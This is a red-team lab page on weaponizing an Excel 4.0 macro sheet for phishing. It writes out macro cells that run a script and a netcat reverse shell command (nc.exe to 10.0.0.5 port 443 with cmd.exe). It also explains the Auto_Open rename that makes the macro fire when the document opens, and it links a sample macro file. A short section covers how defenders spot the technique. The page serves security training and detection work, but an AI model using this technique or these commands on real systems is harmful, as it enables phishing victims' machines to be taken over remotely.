Red Teaming Experiments
linkedingithub@spotheplanetpatreon
Search…
What is ired.team?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
offensive security
Red Team Infrastructure
Initial Access
Password Spraying Outlook Web Access: Remote Shell
Phishing with MS Office
Phishing: XLM / Macro 4.0
T1173: Phishing - DDE
T1137: Phishing - Office Macros
Phishing: OLE + LNK
Phishing: Embedded Internet Explorer
Phishing: .SLK Excel
Phishing: Replacing Embedded Video with Bogus Payload
Inject Macros from a Remote Dotm Template
Bypassing Parent Child / Ancestry Detections
Phishing: Embedded HTML Forms
Phishing with GoPhish and DigitalOcean
Forced Authentication
NetNTLMv2 hash stealing using Outlook
Code Execution
Code & Process Injection
Defense Evasion
Enumeration and Discovery
Privilege Escalation
Credential Access & Dumping
Lateral Movement
Persistence
Exfiltration
reversing, forensics & misc
Internals
Cloud
Neo4j
Dump Virtual Box Memory
AES Encryption Using Crypto++ .lib in Visual Studio C++
Reversing Password Checking Routine
Powered By GitBook
Phishing: XLM / Macro 4.0
This lab is based on the research performed by Stan Hegt from Outflank.

Weaponization

A Microsoft Excel Spreadsheet can be weaponized by firstly inserting a new sheet of type "MS Execel 4.0 Macro":
We can then execute command by typing into the cells:
1
=exec("c:\shell.cmd")
2
=halt()
Copied!
As usual, the contents of shell.cmd is a simple netcat reverse shell:
c:\shell.cmd
1
C:\tools\nc.exe 10.0.0.5 443 -e cmd.exe
Copied!
Note how we need to rename the A1 cell to Auto_Open if we want the Macros to fire off once the document is opened:
Excel 4.0 Macro Functions Reference (1).pdf
5MB
PDF
Excel 4.0 Macro Functions Reference.pdf
phishing-xlm.xlsm
8KB
Binary
XLM Phishing.xlsm

Execution

Opening the document and enabling Macros pops a reverse shell:
Note that XLM Macros allows using Win32 APIs, hence shellcode injection is also possible. See the original research link below for more info.

Observations

As usual, look for any suspicious children originating from under the Excel.exe:
Having a quick look at the file with a hex editor, we can see a suspicious string shell.cmd immediately, which is of course good news for defenders:

References

Old school: evil Excel 4.0 macros (XLM) | Outflank Blog
Outflank Blog
Previous
Phishing with MS Office
Next
T1173: Phishing - DDE
Last modified 3yr ago
Copy link
Contents
Weaponization
Execution
Observations
References